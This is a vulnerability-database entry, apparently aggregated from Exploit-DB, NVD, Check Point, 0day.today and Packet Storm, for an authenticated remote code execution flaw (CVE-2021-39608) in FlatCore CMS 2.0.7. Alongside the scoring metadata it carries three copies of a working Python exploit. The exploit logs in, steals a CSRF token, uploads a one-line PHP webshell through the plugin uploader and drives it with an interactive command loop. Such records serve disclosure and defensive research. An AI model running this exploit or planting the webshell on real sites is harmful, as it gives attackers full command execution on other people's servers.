FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)

2021-09-06T00:00:00

Description

{"id": "EDB-ID:50262", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)", "description": "", "published": "2021-09-06T00:00:00", "modified": "2021-09-06T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/50262", "reporter": "Mason Soroka-Gill", "references": [], "cvelist": ["2021-39608", "CVE-2021-39608"], "immutableFields": [], "lastseen": "2022-05-13T17:35:51", "viewCount": 278, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0809"]}, {"type": "cve", "idList": ["CVE-2021-39608"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164047"]}, {"type": "zdt", "idList": ["1337DAY-ID-36716"]}], "rev": 4}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0809"]}, {"type": "cve", "idList": ["CVE-2020-25004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164047"]}, {"type": "zdt", "idList": ["1337DAY-ID-36716"]}]}, "exploitation": null, "vulnersScore": 6.1}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/50262", "sourceData": "# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)\r\n# Date: 04/10/2021\r\n# Exploit Author: Mason Soroka-Gill @sgizoid\r\n# Vendor Homepage: https://flatcore.org/\r\n# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz\r\n# Version: 2.0.7\r\n# Tested on: Ubuntu Server 21.04\r\n# CVE: CVE-2021-39608\r\n# References:\r\n# - https://github.com/flatCore/flatCore-CMS/issues/52\r\n\r\n#!/usr/bin/env python3\r\n\r\nimport sys\r\nimport requests\r\nfrom lxml import html\r\nfrom urllib.parse import urlencode\r\n\r\nif len(sys.argv) != 4:\r\n print(f\"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'\")\r\n exit(1)\r\n\r\nTARGET = sys.argv[1]\r\nUSERNAME = sys.argv[2]\r\nPASSWORD = sys.argv[3]\r\n\r\n# attempt to log in\r\nresp = requests.post(f\"{TARGET}/index.php?p=1\",\r\n data={\r\n \"login_name\":f\"{USERNAME}\",\r\n \"login_psw\":f\"{PASSWORD}\",\r\n \"login\":\"Anmelden\"})\r\n\r\n# grab the PHP session ID\r\nPHPSESSID = resp.headers['Set-Cookie'].split(\";\")[0]\r\n\r\n# validate credentials worked\r\nresp = requests.get(f\"{TARGET}/acp/acp.php?tn=addons\",\r\n headers={\"Cookie\":PHPSESSID})\r\nif resp.status_code != 200:\r\n print(\"Invalid credentials\")\r\n exit(1)\r\nelse:\r\n print(\"Logged in\")\r\n\r\n# grab the csrf token for the script upload\r\ncsrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value\r\n\r\n# post the shell to the host\r\nresp = requests.post(f\"{TARGET}/acp/core/files.upload-script.php\",\r\n data={\"upload_type\":\"plugin\", \"csrf_token\":csrf_token}, # the csrf token\r\n files={\"file\":(\"sgizoid.php\", \"<?php echo shell_exec($_GET['sg']); ?>\")}, # the webshell\r\n headers={\"Cookie\":PHPSESSID}) # the php session id\r\n\r\n# pretend to be a shell\r\nwhile True:\r\n command = input(\"$ \")\r\n if command.lower() == \"exit\" or command.lower() == \"q\":\r\n break\r\n resp = requests.get(f\"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}\")\r\n # verify payload succeeded\r\n if resp.status_code == 200:\r\n print(resp.text)\r\n else:\r\n print(\"Error: Something went wrong, maybe the shell didn't work?\")\r\n break\r\n\r\n# delete the webshell\r\nresp = requests.get(f\"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php\",\r\n headers={\"Cookie\":PHPSESSID})\r\nif resp.status_code == 200:\r\n print(\"Cleaned up webshell\")\r\n\r\n# clean up the session\r\nresp = requests.get(f\"{TARGET}/index.php?goto=logout\",\r\n headers={\"Cookie\":PHPSESSID})\r\nif resp.status_code == 200:\r\n print(\"Logged out\")\r\n\r\nexit(0)", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:44", "description": "A remote code execution vulnerability exists in FlatCore CMS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-07T00:00:00", "type": "checkpoint_advisories", "title": "FlatCore CMS Remote Code Execution (CVE-2021-39608)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39608"], "modified": "2021-11-07T00:00:00", "id": "CPAI-2021-0809", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T19:04:02", "description": "Remote Code Execution (RCE) vulnerabilty exists in FlatCore-CMS 2.0.7 via the upload addon plugin, which could let a remote malicious user exeuct arbitrary php code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-23T21:15:00", "type": "cve", "title": "CVE-2021-39608", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39608"], "modified": "2021-09-14T18:44:00", "cpe": ["cpe:/a:flatcore:flatcore-cms:2.0.7"], "id": "CVE-2021-39608", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39608", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:flatcore:flatcore-cms:2.0.7:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-12-04T15:51:06", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-06T00:00:00", "type": "zdt", "title": "FlatCore CMS 2.0.7 - Remote Code Execution (Authenticated) Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39608"], "modified": "2021-09-06T00:00:00", "id": "1337DAY-ID-36716", "href": "https://0day.today/exploit/description/36716", "sourceData": "# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)\n# Exploit Author: Mason Soroka-Gill @sgizoid\n# Vendor Homepage: https://flatcore.org/\n# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz\n# Version: 2.0.7\n# Tested on: Ubuntu Server 21.04\n# CVE: CVE-2021-39608\n# References:\n# - https://github.com/flatCore/flatCore-CMS/issues/52\n\n#!/usr/bin/env python3\n\nimport sys\nimport requests\nfrom lxml import html\nfrom urllib.parse import urlencode\n\nif len(sys.argv) != 4:\n print(f\"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'\")\n exit(1)\n\nTARGET = sys.argv[1]\nUSERNAME = sys.argv[2]\nPASSWORD = sys.argv[3]\n\n# attempt to log in\nresp = requests.post(f\"{TARGET}/index.php?p=1\",\n data={\n \"login_name\":f\"{USERNAME}\",\n \"login_psw\":f\"{PASSWORD}\",\n \"login\":\"Anmelden\"})\n\n# grab the PHP session ID\nPHPSESSID = resp.headers['Set-Cookie'].split(\";\")[0]\n\n# validate credentials worked\nresp = requests.get(f\"{TARGET}/acp/acp.php?tn=addons\",\n headers={\"Cookie\":PHPSESSID})\nif resp.status_code != 200:\n print(\"Invalid credentials\")\n exit(1)\nelse:\n print(\"Logged in\")\n\n# grab the csrf token for the script upload\ncsrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value\n\n# post the shell to the host\nresp = requests.post(f\"{TARGET}/acp/core/files.upload-script.php\",\n data={\"upload_type\":\"plugin\", \"csrf_token\":csrf_token}, # the csrf token\n files={\"file\":(\"sgizoid.php\", \"<?php echo shell_exec($_GET['sg']); ?>\")}, # the webshell\n headers={\"Cookie\":PHPSESSID}) # the php session id\n\n# pretend to be a shell\nwhile True:\n command = input(\"$ \")\n if command.lower() == \"exit\" or command.lower() == \"q\":\n break\n resp = requests.get(f\"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}\")\n # verify payload succeeded\n if resp.status_code == 200:\n print(resp.text)\n else:\n print(\"Error: Something went wrong, maybe the shell didn't work?\")\n break\n\n# delete the webshell\nresp = requests.get(f\"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php\",\n headers={\"Cookie\":PHPSESSID})\nif resp.status_code == 200:\n print(\"Cleaned up webshell\")\n\n# clean up the session\nresp = requests.get(f\"{TARGET}/index.php?goto=logout\",\n headers={\"Cookie\":PHPSESSID})\nif resp.status_code == 200:\n print(\"Logged out\")\n\nexit(0)\n", "sourceHref": "https://0day.today/exploit/36716", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-09-07T15:48:31", "description": "", "cvss3": {}, "published": "2021-09-05T00:00:00", "type": "packetstorm", "title": "FlatCore CMS 2.0.7 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-39608"], "modified": "2021-09-05T00:00:00", "id": "PACKETSTORM:164047", "href": "https://packetstormsecurity.com/files/164047/FlatCore-CMS-2.0.7-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated) \n# Date: 04/10/2021 \n# Exploit Author: Mason Soroka-Gill @sgizoid \n# Vendor Homepage: https://flatcore.org/ \n# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz \n# Version: 2.0.7 \n# Tested on: Ubuntu Server 21.04 \n# CVE: CVE-2021-39608 \n# References: \n# - https://github.com/flatCore/flatCore-CMS/issues/52 \n \n#!/usr/bin/env python3 \n \nimport sys \nimport requests \nfrom lxml import html \nfrom urllib.parse import urlencode \n \nif len(sys.argv) != 4: \nprint(f\"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'\") \nexit(1) \n \nTARGET = sys.argv[1] \nUSERNAME = sys.argv[2] \nPASSWORD = sys.argv[3] \n \n# attempt to log in \nresp = requests.post(f\"{TARGET}/index.php?p=1\", \ndata={ \n\"login_name\":f\"{USERNAME}\", \n\"login_psw\":f\"{PASSWORD}\", \n\"login\":\"Anmelden\"}) \n \n# grab the PHP session ID \nPHPSESSID = resp.headers['Set-Cookie'].split(\";\")[0] \n \n# validate credentials worked \nresp = requests.get(f\"{TARGET}/acp/acp.php?tn=addons\", \nheaders={\"Cookie\":PHPSESSID}) \nif resp.status_code != 200: \nprint(\"Invalid credentials\") \nexit(1) \nelse: \nprint(\"Logged in\") \n \n# grab the csrf token for the script upload \ncsrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value \n \n# post the shell to the host \nresp = requests.post(f\"{TARGET}/acp/core/files.upload-script.php\", \ndata={\"upload_type\":\"plugin\", \"csrf_token\":csrf_token}, # the csrf token \nfiles={\"file\":(\"sgizoid.php\", \"<?php echo shell_exec($_GET['sg']); ?>\")}, # the webshell \nheaders={\"Cookie\":PHPSESSID}) # the php session id \n \n# pretend to be a shell \nwhile True: \ncommand = input(\"$ \") \nif command.lower() == \"exit\" or command.lower() == \"q\": \nbreak \nresp = requests.get(f\"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}\") \n# verify payload succeeded \nif resp.status_code == 200: \nprint(resp.text) \nelse: \nprint(\"Error: Something went wrong, maybe the shell didn't work?\") \nbreak \n \n# delete the webshell \nresp = requests.get(f\"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php\", \nheaders={\"Cookie\":PHPSESSID}) \nif resp.status_code == 200: \nprint(\"Cleaned up webshell\") \n \n# clean up the session \nresp = requests.get(f\"{TARGET}/index.php?goto=logout\", \nheaders={\"Cookie\":PHPSESSID}) \nif resp.status_code == 200: \nprint(\"Logged out\") \n \nexit(0) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164047/flatcorecms207-exec.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}

FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)

Description

Related